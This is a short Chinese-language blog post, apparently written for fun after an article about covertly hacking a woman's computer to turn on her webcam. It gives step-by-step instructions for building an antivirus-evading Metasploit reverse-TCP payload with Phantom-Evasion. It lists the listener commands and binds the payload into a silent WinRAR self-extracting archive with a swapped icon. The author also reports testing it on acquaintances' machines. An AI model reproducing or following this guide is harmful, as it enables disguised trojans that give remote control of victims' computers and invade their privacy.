公眾號看到一篇文章《一次滲透妹子電腦開攝像頭全過程》,有點好玩但是現在已經刪了hhhh,想試一下這個免殺工具和捆綁方式。
一、Phantom-Evasion工具安裝
下載地址:https://github.com/oddcod3/Phantom-Evasion
在 kali 下載源碼后
pip3 install pyopenssl 命令安裝 openssl 包
python3 phantom-evasion.py --setup 命令自動配置工具
出現 module 'OpenSSL.crypto' has no attribute 'PKCS12Type' 報錯時在 Phantom-Evasion/Setup/Phantom_lib.py 中將 PKCS12Type 替換成 PKCS12
二、生成msf馬
選擇 windows 模塊、tcp 反彈,按提示配置框架、ip、端口等選項
生成馬后開啟監聽
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost x.x.x.x set lport 5555 exploit
還沒捆綁直接拿范師傅劉師傅和大佬測試一下,哦豁,除了邁克菲阻止了,都成功上線了。但是開攝像頭失敗,暫時不知道是什么原因
三、WinRAR自解壓方式捆綁
打開WinRAR->選中兩個文件->命令->添加文件到壓縮文件中->創建自解壓格式壓縮文件
高級->自解壓選項->填寫解壓后路徑->C:\Windows\Temp(系統的緩存文件路徑)
設置->設置程序提取后運行 C:\Windows\Temp\test.exe
模式->靜默模式->隱藏啟動對話框
更新->更新方式\覆蓋方式->解壓並更新文件\覆蓋所有文件->確定
再進行圖標替換就完美了,使用 Restorator 工具,下載地址:https://www.jb51.net/softs/619405.html
參考文章:
https://www.cnblogs.com/caihon/p/13957013.html
https://tieba.baidu.com/p/2839032849?red_tag=2074930780